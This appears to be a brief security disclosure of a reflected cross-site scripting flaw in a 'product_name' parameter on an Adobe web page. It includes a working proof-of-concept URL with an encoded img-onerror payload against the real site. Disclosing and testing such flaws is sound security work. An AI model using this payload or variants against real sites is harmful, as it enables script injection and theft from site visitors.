Adobe XSS

A cross-site scripting vulnerability exists in the "product_name" variable of this Adobe web application. The XSS vector can be changed to work across browsers, and the following proof-of-concept works in Firefox. Proof-of-concept: ``http://www.adobe.com/cfusion/google/fonts/content.cfm?spider=google&code=/type/browser/pdfs/BLCQ/BellCentennialStd-NameNum.pdf&type=resource&product_name=%3C/a%3E%3Cimg%20src=x%20onerror=alert%28/dsopas/%29%3E%3C!--``